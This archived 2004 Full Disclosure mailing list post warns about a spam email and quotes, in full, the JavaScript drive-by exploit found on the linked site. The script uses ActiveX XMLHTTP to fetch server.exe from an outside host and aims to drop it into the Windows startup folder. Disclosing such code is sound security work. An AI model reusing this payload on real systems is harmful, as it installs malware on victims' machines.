Full Disclosure mailing list archives
Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!]
From: Martin Stricker <shugal () gmx de>
Date: Tue, 07 Sep 2004 11:22:01 +0200
I just got attached e-mail. On the linked website I found this exploit code (sorry for the line breaks): <script> function govuln(){ var w=window.open("javascript:setInterval(function(){try{var tempvar=opener.location.href;}catch(e){location.assign('javascript:var xmlHTTP = new ActiveXObject("Microsoft.XMLHTTP");xmlHTTP.open ("GET","http://real.slon.biz/server.exe",false);xmlHTTP.send();var contents = xmlHTTP.responseBody;document.innerHTML=("<title>You Need a better browser</title><DIV ID=DS2 align=center style=position:absolute;left:10;top:-30;><br><br><center><font face=arial color=black><b>This web page requires Opera Comptable browser</b>&nbspYou can download Opera from the <a href=http://www.opera.com>Opera <frame src=log.php name=frame1 scrolling=no frameborder=no noresize=noresize>Software Group web site</a>.</center></div><html><iframe src=shell:startup HEIGHT=5000; WIDTH=5000 style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-index:-90;></iframe><body onload=showpop()><script>function showpop(){pop=window.createPopup();pop.document.body.style.margin=0;pop.document.body.innerHTML=txt.value;pop.show(100,100,screen.width+300,screen.height+300);}</script><span style=position: absolute; left: 1; top: 1 id=absspan></span><textarea id=txt rows=1 cols=20 style=display:none><html><body><table width=100% height=100%><tr ALIGN=LEFT VALIGN=TOP><br><center><img src=http://real.slon.biz/server.exe id=anch onmousedown=parent.pop.show(1,1,1,1); style=width=4000px;height=4000px;background-image:url(&quot;http://real.slon.biz/1.gif&quot;);></a></td></tr></table></textarea></body></html>")');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000"); w.location.assign=location.assign; location.href="http://localhost"; } govuln() </script> -- Homepage: http://www.martin-stricker.de/ Linux Migration Project: http://www.linux-migration.org/ Webmaster-Forum: http://www.masterportal24.com/cgi-bin/yindex.cgi Red Hat Linux 9 for low memory: http://www.rule-project.org/ Registered Linux user #210635: http://counter.li.org/
--- Begin Message --- From: CNN News Germany <gil () agiv de>
Date: Sat, 04 Sep 2004 03:25:28 +0000
<<< text/html: EXCLUDED >>>
--- End Message ---
Current thread:
- Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!] Martin Stricker (Sep 07)
- Re: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!] Alla Bezroutchko (Sep 07)
- <Possible follow-ups>
- Re: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!] http-equiv () excite com (Sep 09)